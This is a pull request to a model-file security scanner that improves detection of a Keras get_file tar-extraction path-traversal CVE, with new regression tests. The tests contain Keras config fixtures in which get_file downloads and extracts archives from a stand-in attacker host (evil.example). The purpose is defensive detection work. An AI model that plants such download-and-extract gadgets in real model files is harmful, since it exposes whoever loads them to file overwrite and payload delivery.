### PR TITLE
fix: detect explicit keras get_file tar extraction

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -11,6 +11,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 - bound Joblib decompression output to the configured scanner read budget
 - close JIT replay alias, probe-budget, and compound-clause context gaps without suppressing dangerous browser or native-library calls
+- detect Keras get_file tar extraction from effective call arguments without relying on URL suffixes
 - reject cleartext HTTP cloud storage and PyTorch Hub model sources
 - preserve dangerous JIT embedded-Python findings after benign member overwrites while bounding replay and suppression analysis
 - fail closed when capped DVC pointer outputs are not otherwise covered, change during verification, exceed bounded tail verification, or exhaust shared scan budgets

--- a/modelaudit/scanners/keras_zip_scanner.py
+++ b/modelaudit/scanners/keras_zip_scanner.py
@@ -199,10 +199,6 @@ _NESTED_SERIALIZED_OBJECT_KEYS = frozenset(
 # CVE-2025-8747: keras.utils.get_file used as gadget to download + execute files
 _GET_FILE_PATTERN = re.compile(r"get_file", re.IGNORECASE)
 _URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)
-_ARCHIVE_EXTRACT_URL_PATTERN = re.compile(
-    r"\.(?:tar|tgz|tbz2|txz|tar\.gz|tar\.bz2|tar\.xz|tar\.zst|tar\.lz|tar\.lz4|tar\.lzma)(?:[?#]|$)",
-    re.IGNORECASE,
-)
 _URL_SCHEME_PATTERN = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")
 _KERAS_CONFIG_ENTRY = "config.json"
 _KERAS_CONFIG_MAX_BYTES = 10 * 1024 * 1024
@@ -219,6 +215,21 @@ def _has_get_file_reference(values: list[str]) -> bool:
         if stripped_value_lower.endswith(".get_file") or "keras.utils.get_file" in stripped_value_lower:
             return True
 
+    return False
+
+
+def _archive_format_may_extract_tar(value: Any) -> bool:
+    """Mirror Keras archive-format dispatch closely enough to identify tar extraction."""
+    if value == "auto" or value == "tar":
+        return True
+    if isinstance(value, str):
+        return False
+    if isinstance(value, (list, tuple, dict)):
+        for archive_type in value:
+            if archive_type == "tar":
+                return True
+            if archive_type != "zip":
+                return False
     return False
 
 
@@ -1921,38 +1932,31 @@ class KerasZipScanner(BaseScanner):
                 continue
 
             direct_string_values: list[str] = []
-            url_candidate_values: list[str] = []
-            for key, value in node.items():
+            for value in node.values():
                 direct_string_values.extend(self._extract_string_literals(value))
-                key_lower = str(key).lower()
-                if key_lower in {"url", "origin", "args", "kwargs"}:
-                    url_candidate_values.extend(self._extract_string_literals(value, include_dict_values=True))
 
             has_get_file = _has_get_file_reference(direct_string_values)
-            if not has_get_file or not self._node_has_get_file_extract_true(node):
-                continue
-
-            archive_urls = [
-                value
-                for value in url_candidate_values
-                if _URL_PATTERN.search(value) is not None and _ARCHIVE_EXTRACT_URL_PATTERN.search(value) is not None
-            ]
-            if not archive_urls:
+            origin = self._node_get_file_origin(node)
+            if (
+                not has_get_file
+                or not self._node_has_get_file_tar_extraction_semantics(node)
+                or origin is None
+                or _URL_PATTERN.match(origin.strip()) is None
+            ):
                 continue
 
             result.add_check(
                 name="CVE-2025-12060: get_file Archive Extraction Traversal",
                 passed=False,
                 message=(
-                    "CVE-2025-12060: config.json contains keras.utils.get_file with extract=True "
-                    "and a remote tar archive URL"
+                    "CVE-2025-12060: config.json contains keras.utils.get_file with remote tar extraction enabled"
                 ),
                 severity=IssueSeverity.CRITICAL,
                 location=f"{self.current_file_path}/config.json",
                 details={
                     "cve_id": "CVE-2025-12060",
                     "context": context,
-                    "urls": [_redact_url_for_display(url) for url in archive_urls[:5]],
+                    "urls": [_redact_url_for_display(origin)],
                     "cvss": 8.8,
                     "cwe": "CWE-22",
                     "description": (
@@ -1969,21 +1973,52 @@ class KerasZipScanner(BaseScanner):
             return
 
     @staticmethod
-    def _node_has_get_file_extract_true(node: dict[str, Any]) -> bool:
-        """Return True only for direct get_file extract=True argument positions."""
-        if node.get("extract") is True:
-            return True
+    def _node_get_file_argument(node: dict[str, Any], name: str, position: int, default: Any) -> Any:
+        """Resolve one get_file argument from flattened, kwargs, or positional config forms."""
+        if name in node:
+            return node[name]
 
         kwargs = node.get("kwargs")
-        if isinstance(kwargs, dict) and kwargs.get("extract") is True:
-            return True
+        if isinstance(kwargs, dict) and name in kwargs:
+            return kwargs[name]
 
         args = node.get("args")
-        if isinstance(args, list | tuple):
-            # keras.utils.get_file positional args: fname, origin, untar, ..., extract.
-            return (len(args) > 2 and args[2] is True) or (len(args) > 7 and args[7] is True)
+        if isinstance(args, (list, tuple)) and len(args) > position:
+            return args[position]
 
-        return False
+        return default
+
+    @staticmethod
+    def _node_get_file_origin(node: dict[str, Any]) -> str | None:
+        """Return only the actual get_file origin argument, excluding other URL-valued fields."""
+        for container in (node, node.get("kwargs")):
+            if not isinstance(container, dict):
+                continue
+            for key in ("origin", "url"):
+                if key in container:
+                    value = container[key]
+                    return value if isinstance(value, str) else None
+
+        args = node.get("args")
+        if isinstance(args, (list, tuple)) and len(args) > 1:
+            value = args[1]
+            return value if isinstance(value, str) else None
+
+        return None
+
+    @staticmethod
+    def _node_has_get_file_tar_extraction_semantics(node: dict[str, Any]) -> bool:
+        """Return True when effective get_file arguments can extract a tar archive."""
+        untar = KerasZipScanner._node_get_file_argument(node, "untar", 2, False)
+        if bool(untar):
+            return True
+
+        extract = KerasZipScanner._node_get_file_argument(node, "extract", 7, False)
+        if not bool(extract):
+            return False
+
+        archive_format = KerasZipScanner._node_get_file_argument(node, "archive_format", 8, "auto")
+        return _archive_format_may_extract_tar(archive_format)
 
     def _check_unsafe_deserialization_bypass(self, model_config: Any, result: ScanResult) -> None:
         """Check for CVE-2025-9906: enable_unsafe_deserialization bypass in config.json.

--- a/tests/scanners/test_keras_zip_scanner.py
+++ b/tests/scanners/test_keras_zip_scanner.py
@@ -6876,6 +6876,59 @@ class TestCVE20258747GetFileGadget:
         assert len(cve_issues) == 1
         assert cve_issues[0].details["urls"] == ["https://evil.example/payload.tgz"]
 
+    def test_get_file_extract_tar_archive_format_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Explicit tar archive_format should not rely on a tar-looking URL suffix."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "url": "https://evil.example/download?id=payload",
+                            "extract": True,
+                            "archive_format": "tar",
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert cve_issues[0].details["urls"] == ["https://evil.example/download"]
+
+    def test_get_file_named_untar_detects_cve_2025_12060_without_tar_suffix(self, tmp_path: Path) -> None:
+        """Named untar=True should mark a remote get_file URL as tar extraction."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "url": "https://evil.example/download",
+                            "untar": True,
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert cve_issues[0].details["urls"] == ["https://evil.example/download"]
+
     def test_get_file_extract_tar_url_fragment_detects_cve_2025_12060(self, tmp_path: Path) -> None:
         """URL fragments must not hide tar extraction gadgets from CVE attribution."""
         scanner = KerasZipScanner()
@@ -6938,9 +6991,9 @@ class TestCVE20258747GetFileGadget:
         assert cve_issues[0].details["urls"] == ["https://evil.example/payload.tgz"]
 
     def test_get_file_positional_extract_tar_url_detects_cve_2025_12060(self, tmp_path: Path) -> None:
-        """Positional get_file args with extract=True should receive CVE attribution."""
+        """Positional extract=True uses the tar-capable default auto format."""
         scanner = KerasZipScanner()
-        archive_url = "https://evil.example/payload.tar.zst"
+        archive_url = "https://evil.example/download"
         config = {
             "class_name": "Sequential",
             "config": {
@@ -6962,6 +7015,32 @@ class TestCVE20258747GetFileGadget:
         assert len(cve_issues) == 1
         assert cve_issues[0].severity == IssueSeverity.CRITICAL
         assert cve_issues[0].details["urls"] == [archive_url]
+
+    def test_get_file_positional_tar_archive_format_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Positional archive_format='tar' should not rely on a tar-looking URL suffix."""
+        scanner = KerasZipScanner()
+        archive_url = "https://evil.example/download?id=payload"
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "keras.utils.get_file",
+                            "args": ["payload", archive_url, False, None, None, "datasets", "auto", True, "tar"],
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert cve_issues[0].details["urls"] == ["https://evil.example/download"]
 
     def test_get_file_tar_url_without_extract_true_no_cve_2025_12060(self, tmp_path: Path) -> None:
         """Tar URLs are only CVE-2025-12060 when the same get_file call extracts them."""
@@ -6987,8 +7066,33 @@ class TestCVE20258747GetFileGadget:
         assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
         assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-8747"]
 
-    def test_get_file_extract_non_archive_url_no_cve_2025_12060(self, tmp_path: Path) -> None:
-        """extract=True on a non-tar URL is not enough for the tar extraction CVE."""
+    def test_get_file_extract_zip_archive_format_no_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Explicit zip format disables tar extraction even for a tar-looking URL."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "url": "https://evil.example/payload.tar.gz",
+                            "extract": True,
+                            "archive_format": "zip",
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-8747"]
+
+    def test_get_file_extract_default_auto_detects_generic_url_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Default auto format content-sniffs tar archives regardless of URL suffix."""
         scanner = KerasZipScanner()
         config = {
             "class_name": "Sequential",
@@ -7008,8 +7112,198 @@ class TestCVE20258747GetFileGadget:
         }
         result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
 
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].details["urls"] == ["https://evil.example/payload.bin"]
+
+    def test_get_file_extract_explicit_auto_detects_generic_url_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Explicit auto format also enables tar content sniffing."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "origin": "https://evil.example/download",
+                            "extract": True,
+                            "archive_format": "auto",
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].details["urls"] == ["https://evil.example/download"]
+
+    def test_get_file_extract_tar_in_format_list_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """A valid format list may try zip first and then tar."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "origin": "https://evil.example/download",
+                            "extract": True,
+                            "archive_format": ["zip", "tar"],
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+
+    @pytest.mark.parametrize("archive_format", ["tgz", "tar.gz", "TAR", " tar "])
+    def test_get_file_unsupported_archive_format_no_cve_2025_12060(
+        self,
+        tmp_path: Path,
+        archive_format: str,
+    ) -> None:
+        """Unsupported aliases and normalized variants fail before extraction in Keras."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "origin": "https://evil.example/payload.tar.gz",
+                            "extract": True,
+                            "archive_format": archive_format,
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
         assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
-        assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-8747"]
+
+    @pytest.mark.parametrize("archive_format", [None, [], ["auto", "tar"]])
+    def test_get_file_non_tar_effective_format_no_cve_2025_12060(
+        self,
+        tmp_path: Path,
+        archive_format: Any,
+    ) -> None:
+        """Disabled formats and a list that errors before tar cannot reach tar extraction."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "origin": "https://evil.example/payload.tar.gz",
+                            "extract": True,
+                            "archive_format": archive_format,
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+
+    @pytest.mark.parametrize(("argument", "value"), [("extract", 1), ("extract", "yes"), ("untar", 1)])
+    def test_get_file_truthy_extraction_arguments_detect_cve_2025_12060(
+        self,
+        tmp_path: Path,
+        argument: str,
+        value: Any,
+    ) -> None:
+        """Keras uses Python truthiness rather than requiring literal booleans."""
+        scanner = KerasZipScanner()
+        call_config: dict[str, Any] = {
+            "fn": "get_file",
+            "origin": "https://evil.example/download",
+            argument: value,
+        }
+        config = {
+            "class_name": "Sequential",
+            "config": {"layers": [{"class_name": "Dense", "name": "dense_1", "config": call_config}]},
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+
+    def test_get_file_url_valued_kwargs_metadata_is_not_origin(self, tmp_path: Path) -> None:
+        """URL-looking kwargs outside origin/url must not be reported as the downloaded archive."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "kwargs": {
+                                "origin": "/local/model",
+                                "file_hash": "https://docs.example/not-the-origin",
+                                "extract": True,
+                                "archive_format": "tar",
+                            },
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+
+    def test_get_file_url_valued_positional_fname_is_not_origin(self, tmp_path: Path) -> None:
+        """Only positional index 1 is the remote get_file origin."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "args": [
+                                "https://docs.example/not-the-origin",
+                                "/local/model",
+                                False,
+                                None,
+                                None,
+                                "datasets",
+                                "auto",
+                                True,
+                                "tar",
+                            ],
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
 
     def test_get_file_metadata_extract_tar_url_no_cve_2025_12060(self, tmp_path: Path) -> None:
         """Metadata nested beside get_file should not be mistaken for get_file extraction args."""


### PR DESCRIPTION
## Summary
- match Keras `get_file` positional, keyword, truthiness, and archive dispatch semantics
- detect tar extraction for default/explicit `auto`, explicit `tar`, ordered format lists, and `untar`
- avoid false positives from unrelated URL-valued arguments, zip-only extraction, and unsupported archive aliases
- add positive and benign near-match regression coverage

## Validation
- `PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_keras_zip_scanner.py` (524 passed)
- `uv run ruff format --check modelaudit/scanners/keras_zip_scanner.py tests/scanners/test_keras_zip_scanner.py`
- `uv run ruff check modelaudit/scanners/keras_zip_scanner.py tests/scanners/test_keras_zip_scanner.py`
- `uv run mypy modelaudit/scanners/keras_zip_scanner.py tests/scanners/test_keras_zip_scanner.py`
- exact remote tree verified: `9760518807ce29cf72f042d51e9f00b9189d130e`
- commit: `cf900578d041143778d2fded0e2971a8b021eb06`

Full CI is running; local validation intentionally stayed scoped to the changed scanner and tests.